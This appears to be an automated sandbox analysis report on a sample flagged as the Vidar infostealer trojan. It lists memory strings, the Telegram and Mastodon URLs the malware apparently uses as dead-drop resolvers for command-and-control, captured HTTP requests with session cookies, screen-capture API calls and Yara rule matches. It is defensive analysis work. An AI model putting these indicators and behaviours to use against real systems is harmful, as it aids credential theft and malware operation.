              Source: cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594549794.0000000004D57000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526464880.0000000004D57000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.social/custom.css
              Source: cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.social/tags/gitea"
              Source: cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.social/tags/gitlab"
              Source: cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.social/tags/grunewald"
              Source: cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526458800.0000000004D54000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594549794.0000000004D57000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341127759.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572585218.0000000004D75000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594578967.0000000004D75000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341146688.0000000004D09000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594439750.0000000004D06000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341135942.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.social/users/ffoleg94
              Source: cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.social/users/ffoleg94/followers
              Source: cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.social/users/ffoleg94/following
              Source: cvtres.exe, 00000001.00000003.341135942.0000000004D07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatejustice.social;
              Source: cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.joinmastodon.org/
              Source: cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.joinmastodon.org/client/intro/
              Source: cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.340436007.0000000004D01000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572125764.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.479685777.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.386980069.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433280864.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://funk.climatejustice.global
              Source: cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mastodon/mastodon
              Source: cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://joinmastodon.org/
              Source: cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://joinmastodon.org/apps
              Source: uGfpJynSWM.exe, 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.340436007.0000000004D01000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572125764.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.340494604.0000000004D0E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594439750.0000000004D06000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.479685777.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.386980069.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433280864.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/korstonsales
              Source: uGfpJynSWM.exe, 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/korstonsaleshttps://climatejustice.social/
              Source: cvtres.exe, 00000001.00000003.340494604.0000000004D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/korstonsalesi
              Source: cvtres.exe, 00000001.00000003.433280864.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/img/t_logo.png
              Source: cvtres.exe, 00000001.00000003.386988114.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433280864.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
              Source: uGfpJynSWM.exeString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownDNS traffic detected: queries for: t.me
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040A1C1 DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_0040A1C1
              Source: global trafficHTTP traffic detected: GET /korstonsales HTTP/1.1Host: t.me
              Source: global trafficHTTP traffic detected: GET /@ffoleg94 HTTP/1.1Host: climatejustice.social
              Source: global trafficHTTP traffic detected: GET /korstonsales HTTP/1.1Host: t.meCookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
              Source: global trafficHTTP traffic detected: GET /@ffoleg94 HTTP/1.1Host: climatejustice.socialCookie: _mastodon_session=IE12lf0Aiww%2FO2SHgNYf6X8ktxvGiUwFuvpakzTKg55PVj3wQxbOx8QbPNu%2BbA1ljKtplQtfpHSjetQM3MX253iMB2kbLm3xNEhgwBeB%2F1eCW8Wg13ePrm5lWBQfL9FAO02eO7J9l3dW3s6HTqeP4cis2esq7DldbRI0JLHXWe51XjtZNzvE6RX%2BUXAkx0ez6ASRzCFL8XG1b53DHaPoYf9LXuHN45UIQQKGgtGvY8K1mMZsTqoEdXlHxIHPmSknkSeuS38vHUAtiNgsrwJoiv1FJ7nyRHySt6rMdHZwhHdc3ptf6PDZ0wBxvwMpVHuFlqdHAXbX%2FUb%2Bmlizb1luBXM%3D--UaPP34RL8MYYb6Tj--nidR%2BdAjAGmnnhmujvS6WQ%3D%3D
              Source: global trafficHTTP traffic detected: GET /korstonsales HTTP/1.1Host: t.meCookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
              Source: global trafficHTTP traffic detected: GET /@ffoleg94 HTTP/1.1Host: climatejustice.socialCookie: _mastodon_session=3rSSEQhY%2BR%2ByBXGg%2FZ7vjc6lT5LBYSBRTm4v10Vjq3ue%2BjwBExu9w58N8ClT%2Bud5pLw%2FhNpc0ZVmhbGFmRwVbdBlbgslSN94eAItWDOu4CGgiK9jhd3mHMacn3wAdie7Kxd1jN1PXBqcxNNL004FuuBE8ZcXHZ9KeIX6GtzzFfvUtnGWm8ZnLLwl53QYxoy96Xw8%2BDQyXocErXsPhQdIg%2FpxcTsHw5r3GkFxULvXrHFqPB166JKLVDREPTkxqTmFOYedLa6uPEB2T4kW8V44pB5aEoVFQGo6vkNDPnAvIGvofiJ%2FGZzi5%2FYGT7rR2OuS9SAL1tKkIZTobYnVx%2Fquwbo%3D--ciXPLxNa31c7%2FJvd--PL1p0wGZ8YwXdexsQfoBoQ%3D%3D
              Source: global trafficHTTP traffic detected: GET /korstonsales HTTP/1.1Host: t.meCookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
              Source: global trafficHTTP traffic detected: GET /@ffoleg94 HTTP/1.1Host: climatejustice.socialCookie: _mastodon_session=cBV6gswXNvy8Hgb%2BvExlczZjstftQa27zJ%2ByonVRi5vw9q44kYaXOHqqk%2FMhqSyxc2K1n3IXUv4kERfPbDEZOwE6NFx%2BLntMjgu1MWeXu90ji40Xeo7Tz0u9MgjPeSND%2BppXUEiqV%2Bou0NkQvBHoflX27u%2BLD6qQzJ6oEhtEEA7VVKadgTfzBP2a0zRCmF4SsemcSDzT8BNNzs1M%2BIr4CTeavXuTu%2BJCm0uuMkUySIWpjXI2ILBRTS6oqhKWITt4DN8y09XOU2uhmLZARu%2BXQUXiFg8MhEuyus2jpZ3LM2BaLgmhu4lCR67q728X8Wn%2Bl%2FdyVOgV5qfUpjC%2F2Xeeaxs%3D--9MBRf%2FPU0zFwfS96--LxGMiLJEI8rWcXno6EKaag%3D%3D
              Source: global trafficHTTP traffic detected: GET /korstonsales HTTP/1.1Host: t.meCookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
              Source: global trafficHTTP traffic detected: GET /@ffoleg94 HTTP/1.1Host: climatejustice.socialCookie: _mastodon_session=odijTynxlktrze7IgYOSVyYGax6MLuq%2BHgXXNKVkWj0EmP%2BY%2BYajeG%2F8FkitzpankLQzKOs7zUEdBhjbxOzpdZ1RpsOQGZ1AUSKbXvelp9WMXNXnJ654jBiZtol1X4q0pNgUdviAwoWtj%2FRytZuF3icv9tA2rrhSHuj8RNt7upfkwzVVGdrp1OipqNMvxNGxOGsFr55qZoPRd7OunaK4YDlwg%2Bc1dFbtqJ%2FwmLTyaTlwPgipiHfY3D96mosQe3LYewtprF6rsACbNZQUOPaPNuvOAKe1MffUWL9jfeHvRGne%2Frrk4sQKfhRHzSDToiAhNgEMrluTU%2FqXba1%2FBYcmyoU%3D--bxICJGAgGqamQv1Z--NCklHYqUpYEpY8rfNxpO7g%3D%3D
              Source: global trafficHTTP traffic detected: GET /korstonsales HTTP/1.1Host: t.meCookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
              Source: global trafficHTTP traffic detected: GET /@ffoleg94 HTTP/1.1Host: climatejustice.socialCookie: _mastodon_session=G8wdgwz%2FDemSpy0Da1ZLqVdSh5XC%2FhOntkD9%2FioEKONmGFQbKw3ZbiJ4RIMQvyl5QKxN%2FpcDH0nKadQ0yXDwXyz6yqDcLvbVjYrc1VwLIggpvLXohspOLTi9YyRFkDXD1U6%2Fzrzrb4LoA5rAsIFcowDfc23g9dzpYcSLczI6VlHA0lfP8JjHOwarQxEdzM6akhIz0PxsXrVBHQQArBfIyixEHqMzgVy%2FgvPIRcQ2qdVLKMgTPmDwVbQ0%2BqoNguC6M%2F7xjoKMMQknPlrQIslHVR5u8qBY9lIeeNK373jl%2B82kCofXgGW%2BvK4Vwx2GKefGraC9M1B%2Bz7G9H6WpaKFziTw%3D--Ffkg6BiJ3LNw7A7D--YyCOAf66iro8NmL254gNlw%3D%3D
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 167.86.107.75:443 -> 192.168.2.7:49766 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_004166F5 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_004166F5
              Source: uGfpJynSWM.exe, 00000000.00000002.335835109.0000000000EE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.uGfpJynSWM.exe.3be5530.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 0.2.uGfpJynSWM.exe.3be5530.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000001.00000000.334068069.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000001.00000000.333726198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: Process Memory Space: uGfpJynSWM.exe PID: 6360, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: Process Memory Space: cvtres.exe PID: 6392, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: uGfpJynSWM.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.uGfpJynSWM.exe.3be5530.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 0.2.uGfpJynSWM.exe.3be5530.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
